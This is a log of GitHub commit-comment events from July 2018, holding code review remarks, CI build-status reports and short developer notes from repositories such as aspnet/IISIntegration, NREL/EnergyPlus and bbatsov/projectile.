{"id":"7946894294","type":"CommitCommentEvent","actor":{"login":"offby1"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29664220,"position":null,"line":null,"path":null,"commit_id":"0cff66522337fc0b57dd26e4b6db2b57874a0537","created_at":"2018-07-10T23:21:29Z","updated_at":"2018-07-10T23:21:29Z","author_association":"CONTRIBUTOR","body":"This bit me too; I fixed it by just deleting the `global-`."}},"created_at":"2018-07-10T23:21:29Z"}
{"id":"7946896683","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29664230,"position":null,"line":null,"path":null,"commit_id":"31878249d3e2e67f659a907a8ff30dffc80e666e","created_at":"2018-07-10T23:22:20Z","updated_at":"2018-07-10T23:22:20Z","author_association":"COLLABORATOR","body":"<h3>fix dark minimal buttons</h3>\n\nPreview: <strong><a href='https://18218-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18218-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18218-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T23:22:20Z"}
{"id":"7946897191","type":"CommitCommentEvent","actor":{"login":"bojomountain"},"repo":{"name":"bojomountain/hello-world"},"payload":{"comment":{"id":29664231,"position":null,"line":null,"path":null,"commit_id":"a949f15373933104fa950249693659b606999076","created_at":"2018-07-10T23:22:32Z","updated_at":"2018-07-10T23:22:32Z","author_association":"OWNER","body":"more testing"}},"created_at":"2018-07-10T23:22:32Z"}
{"id":"7946898856","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29664239,"position":null,"line":null,"path":null,"commit_id":"e8838d4a7309729c9953f6c4c52db6fa7ea843bc","created_at":"2018-07-10T23:23:09Z","updated_at":"2018-07-10T23:23:09Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T23:23:09Z"}
{"id":"7946899844","type":"CommitCommentEvent","actor":{"login":"IUSR"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29664241,"position":null,"line":null,"path":null,"commit_id":"0cff66522337fc0b57dd26e4b6db2b57874a0537","created_at":"2018-07-10T23:23:29Z","updated_at":"2018-07-10T23:23:29Z","author_association":"NONE","body":"Yep, I did that, too, after exploring other commits :) Now it's been fixed on Prelude's side so no local edits."}},"created_at":"2018-07-10T23:23:29Z"}
{"id":"7946900773","type":"CommitCommentEvent","actor":{"login":"adminplus"},"repo":{"name":"adminplus/hello-world"},"payload":{"comment":{"id":29664246,"position":null,"line":null,"path":null,"commit_id":"6263caa49f3076c778ae8f54e2e74e8bd680f8c3","created_at":"2018-07-10T23:23:47Z","updated_at":"2018-07-10T23:23:47Z","author_association":"OWNER","body":"This is database connection"}},"created_at":"2018-07-10T23:23:47Z"}
{"id":"7946916122","type":"CommitCommentEvent","actor":{"login":"mathewbib"},"repo":{"name":"mathewbib/EEE-Eng"},"payload":{"comment":{"id":29664293,"position":null,"line":null,"path":null,"commit_id":"b6f030de776680796172c39679054889d63e006a","created_at":"2018-07-10T23:29:00Z","updated_at":"2018-07-10T23:29:00Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-10T23:29:00Z"}
{"id":"7946920309","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29664301,"position":null,"line":null,"path":null,"commit_id":"f68b858702c492251262d8785e390004942a3b55","created_at":"2018-07-10T23:30:22Z","updated_at":"2018-07-10T23:30:22Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T23:30:22Z"}
{"id":"7946921761","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29664305,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-10T23:30:50Z","updated_at":"2018-07-10T23:30:50Z","author_association":"NONE","body":"issue_6802 (mbadams5) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T23:30:50Z"}
{"id":"7946923558","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664308,"position":6,"line":16,"path":"src/AspNetCoreModuleV2/CommonLib/config_utility.h","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:31:27Z","updated_at":"2018-07-10T23:31:27Z","author_association":"CONTRIBUTOR","body":"I meant for keys `<add key=\"debugFile\" value=\"\">` vs `<add key=\"ASPNETCORE_MODULE_DEBUG_FILE\" value=\"\">` "}},"created_at":"2018-07-10T23:31:27Z"}
{"id":"7946923681","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29664310,"position":null,"line":null,"path":null,"commit_id":"6c346e8c67b421a6865314aad9b073f9b893479a","created_at":"2018-07-10T23:31:29Z","updated_at":"2018-07-10T23:31:29Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-23](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-23).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-23-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-10T23:31:29Z"}
{"id":"7946924188","type":"CommitCommentEvent","actor":{"login":"fuzun"},"repo":{"name":"FWGS/xash3d"},"payload":{"comment":{"id":29664313,"position":14,"line":1980,"path":"engine/common/filesystem.c","commit_id":"c8338e66a91cbeae68f72a9016dd08da100034e6","created_at":"2018-07-10T23:31:41Z","updated_at":"2018-07-10T23:31:41Z","author_association":"CONTRIBUTOR","body":"This looks like a real crap..."}},"created_at":"2018-07-10T23:31:41Z"}
{"id":"7946924840","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29664317,"position":43,"line":170,"path":"src/NUnitFramework/framework/Internal/TestParameters.cs","commit_id":"dcdc37bf030c744fb6cdccde8ea148b8a092aadf","created_at":"2018-07-10T23:31:55Z","updated_at":"2018-07-10T23:31:55Z","author_association":"CONTRIBUTOR","body":"This method has been inserted in a region labelled \"Other Public Properties\", but it is not a public property!"}},"created_at":"2018-07-10T23:31:55Z"}
{"id":"7946925920","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664318,"position":53,"line":95,"path":"src/AspNetCoreModuleV2/CommonLib/debugutil.cpp","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:32:17Z","updated_at":"2018-07-10T23:32:17Z","author_association":"CONTRIBUTOR","body":"do you need `std::wstring` here?"}},"created_at":"2018-07-10T23:32:17Z"}
{"id":"7946928853","type":"CommitCommentEvent","actor":{"login":"ogradyso"},"repo":{"name":"ogradyso/planets"},"payload":{"comment":{"id":29664321,"position":4,"line":4,"path":"mars.txt","commit_id":"25bcdb72052e68aede928ee08ae0aab6f3639445","created_at":"2018-07-10T23:33:16Z","updated_at":"2018-07-10T23:33:16Z","author_association":"OWNER","body":"Addint some more information about planets here."}},"created_at":"2018-07-10T23:33:16Z"}
{"id":"7946932412","type":"CommitCommentEvent","actor":{"login":"shouldergiant"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29664326,"position":12,"line":13,"path":"app/templates/components/nav-bar.hbs","commit_id":"33423e62b8034c04a85eefffba452f5c578ddd62","created_at":"2018-07-10T23:34:33Z","updated_at":"2018-07-10T23:34:33Z","author_association":"OWNER","body":"https://github.com/shouldergiant/prototypal-ember/pull/88/commits/d0674bb0de00d79157a4a1e5bc173616d7ccb820"}},"created_at":"2018-07-10T23:34:33Z"}
{"id":"7946933621","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664331,"position":9,"line":36,"path":"src/AspNetCoreModuleV2/CommonLib/debugutil.h","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:35:02Z","updated_at":"2018-07-10T23:35:02Z","author_association":"CONTRIBUTOR","body":"`IHttpServer&/IHttpApplication&`"}},"created_at":"2018-07-10T23:35:02Z"}
{"id":"7946934426","type":"CommitCommentEvent","actor":{"login":"lukehutch"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29664334,"position":null,"line":null,"path":null,"commit_id":"93910ad57ca4a3b4456a05b1b41bb1aba5f7bb92","created_at":"2018-07-10T23:35:17Z","updated_at":"2018-07-10T23:35:17Z","author_association":"OWNER","body":"Actually though you just got me thinking, if \"Zip Slip\" is now widely known, as of April this year, I should probably push out this commit as an update. I didn't think it was that high priority, so I was waiting for some more changes before releasing."}},"created_at":"2018-07-10T23:35:17Z"}
{"id":"7946935277","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664337,"position":112,"line":126,"path":"src/AspNetCoreModuleV2/CommonLib/debugutil.cpp","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:35:36Z","updated_at":"2018-07-10T23:35:36Z","author_association":"CONTRIBUTOR","body":"what would happen if called multiple times?"}},"created_at":"2018-07-10T23:35:36Z"}
{"id":"7946937094","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29664338,"position":13,"line":null,"path":"main/f2fs-tools/APKBUILD","commit_id":"4a0dda37fcd660854ef87756f0c8c6d31f97008c","created_at":"2018-07-10T23:36:14Z","updated_at":"2018-07-10T23:36:14Z","author_association":"MEMBER","body":"Why you did this change?"}},"created_at":"2018-07-10T23:36:14Z"}
{"id":"7946938508","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664343,"position":43,"line":85,"path":"src/AspNetCoreModuleV2/CommonLib/debugutil.cpp","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:36:45Z","updated_at":"2018-07-10T23:36:45Z","author_association":"CONTRIBUTOR","body":"You can use RETURN_IF_FAILED here."}},"created_at":"2018-07-10T23:36:45Z"}
{"id":"7946940713","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664347,"position":15,"line":56,"path":"src/AspNetCoreModuleV2/CommonLib/debugutil.cpp","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:37:32Z","updated_at":"2018-07-10T23:37:32Z","author_association":"CONTRIBUTOR","body":"remove local\r\n"}},"created_at":"2018-07-10T23:37:32Z"}
{"id":"7946941116","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664349,"position":6,"line":16,"path":"src/AspNetCoreModuleV2/CommonLib/debugutil.cpp","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:37:41Z","updated_at":"2018-07-10T23:37:41Z","author_association":"CONTRIBUTOR","body":"nit"}},"created_at":"2018-07-10T23:37:41Z"}
{"id":"7946941196","type":"CommitCommentEvent","actor":{"login":"MrGaabriel"},"repo":{"name":"BarryBot/Barry"},"payload":{"comment":{"id":29664350,"position":null,"line":null,"path":null,"commit_id":"27047c2d9f191aec62bec5e2de5fa74b19c76579","created_at":"2018-07-10T23:37:43Z","updated_at":"2018-07-10T23:37:43Z","author_association":"CONTRIBUTOR","body":"fun fact: eu tinha feito isso para testar alguns módulos em outros servidores, lembrando que com autorização prévia \r\nyay"}},"created_at":"2018-07-10T23:37:43Z"}
{"id":"7946941852","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664352,"position":4,"line":33,"path":"src/AspNetCoreModuleV2/AspNetCore/src/applicationmanager.cxx","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:37:56Z","updated_at":"2018-07-10T23:37:56Z","author_association":"CONTRIBUTOR","body":"nit"}},"created_at":"2018-07-10T23:37:56Z"}
{"id":"7946945079","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664362,"position":18,"line":48,"path":"src/AspNetCoreModuleV2/AspNetCore/src/applicationmanager.cxx","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:39:08Z","updated_at":"2018-07-10T23:39:08Z","author_association":"CONTRIBUTOR","body":"Can this be handled in debugutil itself?"}},"created_at":"2018-07-10T23:39:08Z"}
{"id":"7946945168","type":"CommitCommentEvent","actor":{"login":"calba09"},"repo":{"name":"felicia27/app-practice"},"payload":{"comment":{"id":29664363,"position":6,"line":33,"path":"app-practice/ViewController.swift","commit_id":"690d561b3e833515dd496589e2da2f6d49184ffe","created_at":"2018-07-10T23:39:10Z","updated_at":"2018-07-10T23:39:10Z","author_association":"COLLABORATOR","body":"You can add more logic to this method."}},"created_at":"2018-07-10T23:39:10Z"}
{"id":"7946946345","type":"CommitCommentEvent","actor":{"login":"calba09"},"repo":{"name":"felicia27/app-practice"},"payload":{"comment":{"id":29664369,"position":5,"line":32,"path":"app-practice/ViewController.swift","commit_id":"690d561b3e833515dd496589e2da2f6d49184ffe","created_at":"2018-07-10T23:39:34Z","updated_at":"2018-07-10T23:39:34Z","author_association":"COLLABORATOR","body":"You can add more logic to this method."}},"created_at":"2018-07-10T23:39:34Z"}
{"id":"7946948138","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29664374,"position":null,"line":null,"path":null,"commit_id":"16c19cc0d55d7fae329643983d181bb1e5ad8b33","created_at":"2018-07-10T23:40:12Z","updated_at":"2018-07-10T23:40:12Z","author_association":"CONTRIBUTOR","body":"If I use up to date `uBlock-filters` and `MVPS` the video works fine on my end,\r\nReading through the reddit link, you would like to have a working fix without allowing any `gemius` or  `adtech` requests.\r\n\r\nI fail to see how I could add such a fix, keep in mind that all `uAssets` filters have to\r\n\r\n- work with a default setup\r\n- work with both Chrome and Firefox\r\n- not break site functionality\r\n\r\nFor example in this case I can avoid the `adserver.adtech.de` exception filters easyly enough by adding\r\n`||adserver.adtech.de^$xmlhttprequest,redirect=nooptext,domain=tn.nova.cz,important`\r\nworks fine with Chrome, the problem is Firefox does not support xmlhttprequest-redirections, so I have to allow it to fix the \"video does not work because you use an adblocker\"message.\r\n\r\n"}},"created_at":"2018-07-10T23:40:12Z"}
{"id":"7946952795","type":"CommitCommentEvent","actor":{"login":"paladox"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29664385,"position":null,"line":null,"path":null,"commit_id":"b9dea600519b4e82ed3c23dff1f8ce76c2eb0a76","created_at":"2018-07-10T23:41:53Z","updated_at":"2018-07-10T23:41:53Z","author_association":"MEMBER","body":"done in https://github.com/miraheze/mw-config/commit/1655b01441d63a08f24fd569b82db1e76e375351"}},"created_at":"2018-07-10T23:41:53Z"}
{"id":"7946954018","type":"CommitCommentEvent","actor":{"login":"mpiercy"},"repo":{"name":"mpiercy/hpc-intro"},"payload":{"comment":{"id":29664388,"position":null,"line":null,"path":null,"commit_id":"c29c91d6816e82e4690ff45a1c0311cc51c33a25","created_at":"2018-07-10T23:42:18Z","updated_at":"2018-07-10T23:42:18Z","author_association":"OWNER","body":"Also this it for Instructor-training/checkout assignment\r\nThanks,\r\nMark"}},"created_at":"2018-07-10T23:42:18Z"}
{"id":"7946957506","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29664398,"position":null,"line":null,"path":null,"commit_id":"f56a094b3b3b82f2ea9e264d050c524937a01f5d","created_at":"2018-07-10T23:43:37Z","updated_at":"2018-07-10T23:43:37Z","author_association":"COLLABORATOR","body":"@thomasmari \r\nI am also replying here just for the sake of completeness.\r\n\r\n> minimum distance you get is 1E-2 which is really bad\r\n\r\nYour phase-type model has a bug in it. I have sent you an email with a detailed explanation.\r\n\r\n> the dynamic computation don't converge within 100 000 000 iteration (hybrid)\r\n\r\nWhen you have two concurrently enabled exponential transitions, the probability of the first one winning is (lambda1 / (lambda1 + lambda2)). Something like this is (uniformization) actually done to produce a DTMC. When this DTMC gets very low probabilities, power method performance may suffer a lot, because it may increase the required number of iterations to approach the steady-state.\r\n\r\nImagine a queue-like model with a single initial state. \r\nThe DTMC transitions for the initial state are:\r\n1. Stay where you are with probability of 0.99999\r\n1. Go into another state with probability of 0.00001\r\n\r\nYou can probably already guess the problem, as you will need an average of 1/0.00001 = 100000 \"attempts\" to even leave the initial state (geometric distribution).\r\nThe iterations are not really \"attempts\", but rather creating a new distribution by multiplying the previous one with the DTMC probability matrix. Either way, it would take many iterations to even properly start \"pouring out\" of the initial state.\r\n\r\nFor this reason, the power method might not do too well here. I think Gauss-Seidel might work better, but I am not sure about it. Either way, remember that if you use Gauss-Seidel instead, the comparison will not be fair anymore."}},"created_at":"2018-07-10T23:43:37Z"}
{"id":"7946963031","type":"CommitCommentEvent","actor":{"login":"jkotalik"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664420,"position":18,"line":48,"path":"src/AspNetCoreModuleV2/AspNetCore/src/applicationmanager.cxx","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:45:35Z","updated_at":"2018-07-10T23:45:35Z","author_association":"CONTRIBUTOR","body":"I don't believe so, it needs to be called twice for the shim and request handler."}},"created_at":"2018-07-10T23:45:35Z"}
{"id":"7946963594","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29664421,"position":5,"line":302,"path":"libpyEM/qtgui/valslider.py","commit_id":"4a37c27781648a904557e427e58e2b3545002bfc","created_at":"2018-07-10T23:45:47Z","updated_at":"2018-07-10T23:45:47Z","author_association":"MEMBER","body":"Did you change this because of an error or thrown exception?"}},"created_at":"2018-07-10T23:45:47Z"}
{"id":"7946966446","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29664427,"position":18,"line":48,"path":"src/AspNetCoreModuleV2/AspNetCore/src/applicationmanager.cxx","commit_id":"13a44a85f60dff1e815896d3168c5eaf731a3325","created_at":"2018-07-10T23:46:47Z","updated_at":"2018-07-10T23:46:47Z","author_association":"CONTRIBUTOR","body":"It would be in different modules. You can handle multiple calls per module."}},"created_at":"2018-07-10T23:46:47Z"}
{"id":"7946966498","type":"CommitCommentEvent","actor":{"login":"jlblancoc"},"repo":{"name":"MRPT/mrpt-web"},"payload":{"comment":{"id":29664429,"position":null,"line":null,"path":null,"commit_id":"89018706390beb3c4cc03e2bd92a498f966415e2","created_at":"2018-07-10T23:46:49Z","updated_at":"2018-07-10T23:46:49Z","author_association":"MEMBER","body":"Ah, ok! In general, I would advise against storing redundant data, since it opens the door for **inconsistency**.\r\n\r\nUnless there is some important reason (e.g. performance?) or alike... Let's see what @jolting thinks about this. Perhaps I'm becoming too rigid with aging ;-)"}},"created_at":"2018-07-10T23:46:49Z"}
{"id":"7946966514","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29664430,"position":null,"line":null,"path":null,"commit_id":"c429c0a17bda49ad3334065b61bbfca7a65716da","created_at":"2018-07-10T23:46:49Z","updated_at":"2018-07-10T23:46:49Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/81/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/81//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c429c0a17bda49ad3334065b61bbfca7a65716da/81/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c429c0a17bda49ad3334065b61bbfca7a65716da/81/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c429c0a17bda49ad3334065b61bbfca7a65716da/81/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c429c0a17bda49ad3334065b61bbfca7a65716da/81/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-10T23:46:49Z"}
{"id":"7946970585","type":"CommitCommentEvent","actor":{"login":"Narulacodes"},"repo":{"name":"UltraLang/UltraLangScript"},"payload":{"comment":{"id":29664438,"position":null,"line":null,"path":null,"commit_id":"e0ebbb150cc48c8b0bafb4e8f34b9d6a110e0972","created_at":"2018-07-10T23:48:19Z","updated_at":"2018-07-10T23:48:19Z","author_association":"CONTRIBUTOR","body":"Yeah @amazinigmech2418  We need this."}},"created_at":"2018-07-10T23:48:19Z"}
{"id":"7946973187","type":"CommitCommentEvent","actor":{"login":"jackzampolin"},"repo":{"name":"jackzampolin/tendermint"},"payload":{"comment":{"id":29664442,"position":null,"line":null,"path":null,"commit_id":"5e5bb2610df3a18bdbecc22b0e7e08e635ce1fc1","created_at":"2018-07-10T23:49:21Z","updated_at":"2018-07-10T23:49:21Z","author_association":"OWNER","body":"@kiddyboots216 Did you follow the instructions to setup your $GOPATH and $GOBIN? It looks like you haven't done that...\r\n\r\nhttps://github.com/golang/go/wiki/SettingGOPATH"}},"created_at":"2018-07-10T23:49:21Z"}
{"id":"7946980876","type":"CommitCommentEvent","actor":{"login":"joshleeb"},"repo":{"name":"WeAreRust/Nes"},"payload":{"comment":{"id":29664465,"position":7,"line":11,"path":"Cargo.toml","commit_id":"d3b3f15cdd520fa2dbf7c36d8531600a746a27d5","created_at":"2018-07-10T23:52:10Z","updated_at":"2018-07-10T23:52:10Z","author_association":"CONTRIBUTOR","body":"Should be able to use it with `extern crate nes;` and Rust will work out that you're referring to the root level `lib` crate."}},"created_at":"2018-07-10T23:52:10Z"}
{"id":"7946982336","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29664466,"position":null,"line":null,"path":null,"commit_id":"6a3acc432dde27cad167ca14b72a22ae1f74ce3e","created_at":"2018-07-10T23:52:42Z","updated_at":"2018-07-10T23:52:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the clear completion button remove the completed tasks](https://trello.com/c/SRlwXlAr/8-make-the-clear-completion-button-remove-the-completed-tasks)"}},"created_at":"2018-07-10T23:52:42Z"}
{"id":"7946986485","type":"CommitCommentEvent","actor":{"login":"xinyunh0929"},"repo":{"name":"rshelar/nodejs-docs-samples"},"payload":{"comment":{"id":29664477,"position":null,"line":null,"path":null,"commit_id":"52caacb95d9f4909c00d6ebc1cb2801226cc1091","created_at":"2018-07-10T23:54:10Z","updated_at":"2018-07-10T23:54:10Z","author_association":"NONE","body":"BTW, actually we need to complete all those snippet tags."}},"created_at":"2018-07-10T23:54:10Z"}
{"id":"7946991021","type":"CommitCommentEvent","actor":{"login":"xinyunh0929"},"repo":{"name":"rshelar/nodejs-docs-samples"},"payload":{"comment":{"id":29664483,"position":null,"line":null,"path":null,"commit_id":"52caacb95d9f4909c00d6ebc1cb2801226cc1091","created_at":"2018-07-10T23:55:46Z","updated_at":"2018-07-10T23:55:46Z","author_association":"NONE","body":"May we change 'jobs' to 'jobsServiceClient' or 'jobsService' or something like that?"}},"created_at":"2018-07-10T23:55:46Z"}
{"id":"7946994045","type":"CommitCommentEvent","actor":{"login":"prspkt"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29664492,"position":13,"line":null,"path":"main/f2fs-tools/APKBUILD","commit_id":"4a0dda37fcd660854ef87756f0c8c6d31f97008c","created_at":"2018-07-10T23:56:56Z","updated_at":"2018-07-10T23:56:56Z","author_association":"CONTRIBUTOR","body":"I think it is a bit easier to directly copy - paste the URL without de-referencing the `$pkgname` variable and replacing it. Pasting this `https://git.kernel.org/cgit/linux/kernel/git/jaegeuk/f2fs-tools.git` goes straight to the repo."}},"created_at":"2018-07-10T23:56:56Z"}
{"id":"7946994441","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29664493,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-10T23:57:05Z","updated_at":"2018-07-10T23:57:05Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T23:57:05Z"}
{"id":"7946996389","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29664502,"position":null,"line":null,"path":null,"commit_id":"e8838d4a7309729c9953f6c4c52db6fa7ea843bc","created_at":"2018-07-10T23:57:48Z","updated_at":"2018-07-10T23:57:48Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T23:57:48Z"}
{"id":"7946996422","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29664503,"position":null,"line":null,"path":null,"commit_id":"ea9238f42f1463f1eb81c112945c9263cc77b268","created_at":"2018-07-10T23:57:49Z","updated_at":"2018-07-10T23:57:49Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-grid](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-grid).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-grid-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T23:57:49Z"}
